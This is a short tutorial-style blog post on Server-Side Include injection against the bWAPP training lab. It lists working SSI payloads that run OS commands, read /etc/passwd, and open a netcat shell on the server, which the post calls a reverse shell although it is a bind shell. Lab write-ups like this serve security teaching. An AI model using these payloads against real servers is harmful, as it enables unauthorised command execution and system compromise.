Android HackingCyber SecurityCybrainLab Setup

Server-Side Include (SSI) Injection

 

bWAPP – Server-Side Include (SSI) Injection

What is SSI?

It is a server-side scripting language that is used on the web.

It is supported by Apache, nginx & Microsoft ISS.

 

It uses the extensions; .shtml, .stm, .shtm

 

SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user.

 

It is commonly used to save time when developing web apps with dynamic content.

 

SSI directive characters

< ! # = / . ” – > and [a-zA-Z0-9]

 

Common directives

  • Include – allows the content of one document to be transcluded into another. The parameter will specify the file to be included (file)
  • Exec – This directive executes a program, script or shell on the server. The cmd parameter specifies a server side command.

 

Syntax

<!–#command <parameter>=”value”–>

Example: <!–#exec cmd=”whoami” –>

 

What is server-side includes Injection?

The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields.

 

Analyzing the web application

  • Check if the web app is properly validating the various input fields, by testing the characters that are used in the SSI directives.
  • < ! # = / . ” – > and [a-zA-Z0-9]

 

Analyzing the POST request

  • Send test data to see the result
  • Analyze the POST request

 

Low

  • With the security on low, we can test a standard SSI command with all SSI directive characters.
  • Execute OS commands:
    • <!–#exec cmd=”whoami” –>  –System info

    • <!–#exec cmd=”cat /etc/passwd” –> passwsd file

  • Reverse Shell
    • 1st entry: Reverse Shell

    • <!–#exec cmd=”nc -lvp 1234 -e /bin/bash” –>

 

Medium

  • Test previous commands – There is some data validation for some SSI specific directives.
  • The first we can try is the quotation marks from the commands.
  • <!–#exec cmd=ls –>

Did you like this?
Tip Ankush Gaikwad with Cryptocurrency

Donate Bitcoin to Ankush Gaikwad

Scan to Donate Bitcoin to Ankush Gaikwad
Scan the QR code or copy the address below into your wallet to send some bitcoin:

Donate Bitcoin Cash to Ankush Gaikwad

Scan to Donate Bitcoin Cash to Ankush Gaikwad
Scan the QR code or copy the address below into your wallet to send bitcoin:

Donate Ethereum to Ankush Gaikwad

Scan to Donate Ethereum to Ankush Gaikwad
Scan the QR code or copy the address below into your wallet to send some Ether:

Donate Litecoin to Ankush Gaikwad

Scan to Donate Litecoin to Ankush Gaikwad
Scan the QR code or copy the address below into your wallet to send some Litecoin:

Donate Monero to Ankush Gaikwad

Scan to Donate Monero to Ankush Gaikwad
Scan the QR code or copy the address below into your wallet to send some Monero:

Donate ZCash to Ankush Gaikwad

Scan to Donate ZCash to Ankush Gaikwad
Scan the QR code or copy the address below into your wallet to send some ZCash:

Ankush Gaikwad

Software/web/App Developer and Cyber Security Investigator

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button
Close
Close
Open chat
1
Hello
Welcome to CYBRAIN INFOSEC
...you are chatting direct to Mr.Ancush Gaikwad (CTO).Feel free to share your query with him.
REGARDS
CYBRAIN INFOSEC
Powered by

You have successfully subscribed to the newsletter

There was an error while trying to send your request. Please try again.

CYBRAIN INFOSEC will use the information you provide on this form to be in touch with you and to provide updates and marketing.